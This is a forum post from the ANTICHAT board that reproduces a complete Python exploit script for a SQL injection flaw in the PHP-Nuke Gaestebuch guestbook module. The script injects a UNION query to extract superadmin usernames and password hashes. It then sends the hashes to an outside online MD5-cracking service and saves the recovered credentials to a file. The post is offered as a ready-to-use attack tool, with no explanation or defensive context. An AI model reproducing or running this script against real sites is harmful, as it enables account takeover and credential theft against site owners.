ANTICHAT - Показать сообщение отдельно - [ Обзор уязвимостей PHP-Nuke ]

PHP-Nuke GaestebuchSQL Injection Exploit
Код:
#!/usr/bin/python 
# PHP-Nuke Gaestebuch Module SQL Injection Exploit 
# Coded By Shahin Ramezany For Fun 
# E-Mail : Admin@secuiran.com 
 
import string 
import urllib 
import sys 
import re 
 
def Secuiran(): 
        print "\n" 
        print "#####################################################" 
        print "#                WwW.Secuiran.Com                   #" 
        print "# PHP-Nuke Gaestebuch Module SQL Injection Exploit  #" 
        print "#  Coded By Shahin . Ramezany (Vampire) For Fun     #" 
        print "# Keep It Priv8 && Never Post In Public Forum's     #" 
        print "#          E-Mail : Admin@Secuiran.com            #" 
        print "# Gr33tz To : Syst3m_F4ult ,Shinobi ,Samir ,Xtemix  #" 
        print "# Digilas ,Skuk ,Raptor &All Of Secuiran Member's   #" 
        print "#####################################################" 
        print "\n" 
 
 
 
 
#Call Banner 
Secuiran() 
 
print "\n[+] Target Host: e.g: http://127.0.0.1/phpnuke/" 
try: 
        host=raw_input("\nTarget Host (with http) : ") 
except KeyboardInterrupt: 
        print "\n[-] Program Terminated" 
        sys.exit() 
 
print "\n[+] Output File: e.e: secuiran.txt" 
 
try: 
        secuiran=raw_input("\nOutput File: ") 
except KeyboardInterrupt: 
        print "\n[-] Program Terminated" 
        sys.exit() 
 
print "\n[+] Trying  To Connect ...\n" 
 
#SQL Injection URL 
sql_inject=host+"/modules.php?name=gaestebuch_v22&func=edit&id=-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors+where+radminsuper=1" 
 
response = urllib.urlopen(sql_inject).read() 
 
print "[+] Trying  To Inject Code ...\n" 
#Extract Admin User 
 
findall_users=re.compile('<td><input type="text" name="guestemail" size="20" maxlength="50" value="(\w+)"></td>').findall 
found_users=findall_users(response) 
 
#check found user length 
if len(found_users)==0: 
    print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable " 
    sys.exit() 
 
#Extract Admin Hash 
response = urllib.urlopen(sql_inject).read() 
findall_hashs=re.compile('<textarea cols="50" rows="20" name="guesttext">(\w+)</textarea>').findall 
found_hashs=findall_hashs(response) 
if len(found_hashs)==0: 
    print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable " 
    sys.exit() 
 
 
#Crack The Hash 
md5 = string.join( found_hashs, '' ) 
print "[+] Trying To Crack The Hash ..." 
crack="http://tmto.org/server/proxy.php?action=search&div=result&host=MD5_1&arg="+md5 
result = urllib.urlopen(crack).read() 
cracked = re.compile("MD5_1_result,"+md5+" - (\w+)").findall 
if re.match(result,"MD5_1_result,"+md5+" - not found"): 
   print "[-] Can Not Crack" 
   #sys.exit() 
 
found=cracked(result) 
#Convert List To String 
cracked_md5 = string.join( found, '' ) 
 
#Print All Info 
Secuiran() 
print "\n[+] Host : ",host 
for i in range(len(found_users)): 
        print "\n[+] Admin User :  ",found_users[i] 
        print "\n[+] Admin Hash :  ",found_hashs[i] 
if (cracked_md5 == "not"): 
        print "\n[-] Sorry Can Not Crack Your Hash Go And Try More !!!" 
else: 
        print "\n[+] Hash Cracked Successfully : ",cracked_md5 
 
#Save All Info In File 
file = open(secuiran, "w") 
file.write("**************************************************WwW.Secuiran.Com**************************************************\n") 
file.write("\n") 
file.write("HOST :") 
file.write("       ") 
file.write(host) 
file.write("\n") 
file.write("\n") 
file.write("USER                        HASH\n") 
file.write("            ") 
file.write("\n") 
for i in range(len(found_users)): 
    file.write(found_users[i]) 
    file.write("                         ") 
    file.write(found_hashs[i]) 
    file.write("\n") 
file.write("\n") 
if (cracked_md5 == "not"): 
        file.write("\n") 
        file.write("I Can't Crack Your Hash") 
else: 
        file.write("Cracked :") 
        file.write("            ") 
        file.write("\n") 
        file.write(cracked_md5) 
        file.write("\n") 
        file.write("**************************************************WwW.Secuiran.Com**************************************************\n") 
file.close() 
print "\n[+] Successfully, Writed To ",secuiran," File ."